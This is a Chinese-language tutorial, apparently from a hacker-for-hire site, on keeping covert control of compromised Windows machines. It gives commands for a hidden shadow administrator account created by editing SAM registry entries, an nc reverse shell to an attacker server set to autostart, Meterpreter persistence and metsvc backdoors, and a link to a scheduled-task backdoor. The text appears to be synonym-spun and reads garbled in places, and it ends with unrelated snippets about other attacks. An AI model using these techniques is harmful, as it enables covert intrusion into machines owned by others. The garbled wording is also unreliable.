当咱们在浸透过程中经过缝隙获取到方针主机权限后,往往会由于服务器管理员发现和修补缝隙而导致对服务器权限的丢掉,所以权限保持就显得很重要了。
在windows主机中,我总结了下面几种权限保持的办法,不足之处还望各位大佬指正。
增加影子账户
影子账户能够理解为和主体如出一辙可是又看不见的账户,其隐蔽性较好,只能在注册表里边看到。
首要,咱们需求创立一个躲藏账号OMG$ 运用指令 net user OMG$ /add 即可。
注:躲藏账户是指在运用 net user 指令下看不到的账户。
翻开注册表编辑器,找到HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/选项,双击Administrator记住类型下面的十六进制值0x1f4找到左边对应得文件夹即000001F4,双击翻开仿制里边F下的一切内容。
同理,翻开OMG$对应的文件夹,将刚刚仿制的内容粘贴到F 下。然后将Names下的OMG$和000003EC导出注册表,姓名随意取。接着删去OMG$用户(net user OMG$ /del)。最终一步,导入刚刚导出的两个注册表即可(双击即可导入)。
刊出当时用户,运用OMG$登录,发现登录成功:
NC自启动
咱们能够在受害主机上上传NC,并修正注册表将NC增加为开机自启,不过这种办法需求有一台公网服务器或许将本机端口进行映射。
先来看一下nc的指令:
首要在服务器上开一个监听端口 (nc –l –vv –p yourport):
然后在受害主机上履行nc –t –e cmd.exe ipport,能够看到服务器上现已接纳到来自受害主机的cmdshell。
现在需求修正受害主机注册表,将上一条指令nc –t –ecmd.exe ip port增加为开机自启,这样受害主机每一次重启之后依然会自动衔接咱们的服务器,不过条件是你的服务器得一向监听相关端口,有点鸡肋。
MSF权限保持
运用MSF保持权限的条件是先取得一个Meterpretershell,经过Merterpretershell获取持久性shell的办法有两种:
Persistence模块
首要检查persistence模块协助信息:
运转run persistence -U -i 10 -p 4444 -r 192.168.34.132:
-U:设置后门在用户登录后自启动。该 *** 会在HKCUSoftwareMicrosoftWindowsCurrentVersionRun下增加注册表信息。引荐运用该参数;
-i:设置反向衔接间隔时间,单位为秒;
-p:设置反向衔接的端口号;
-r:设置反向衔接的ip地址。
重启受害主机后,shell依然反弹会回来:
Metsvc 模块
相同的,先来看一下它的参数:
很简单,直接运转就能够了。
从这儿能够看到,它是经过在,方针主机上敞开了一个服务。
监听31337端口使用handler下的windows/metsvc_bind_tcp模块,从头取得shell。
Powershell权限保持
这儿引荐一个powershell脚本:https://github.com/re4lity/Schtasks-Backdoor,运用办法见Readme文件。
[1] [2] 黑客接单网
关于成功率的说法通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。 Windows XP 专业 x64 版 SP2借不了赌怎么办、总输钱...
今日网络黑客接单网给大伙儿产生得是实战演练大批量化网站入侵,期待能给大伙儿产生技术性上的视觉享受,好啦,還是规矩,不空话,刚开始...
曾经觉得sqlmap自己玩得挺溜了,成果最近有一个使命,需求调用sqlmap api接口来验证存在sql注入缝隙的站点,一开端听到这个使命觉得完了,或许完结不了了。后来我去网上搜了搜相关的材料,发现关...
SentinelOne研究人员剖析发现Emotet运用一次性C2服务器来绕过IP ACL和域名过滤的检测。 跟着Emotet这种模块化下载器的增加,进犯从单一进犯来引发大型灾祸。本文剖析Emotet用...
/// <param name="sql"></param>图6 引进进犯代码这个API:api.spreaker.com/crossdomain.xml也存在缝隙,所以我一起...
缝隙是运用办理员iis设置的失误也即新版菜刀这里有两个以上的分号导致无法衔接assert类型的一句话能够看到,延时20秒才会出作用。 其实大部分的盲注和显错注入都能够用这个来检测。 已然要打造一款bu...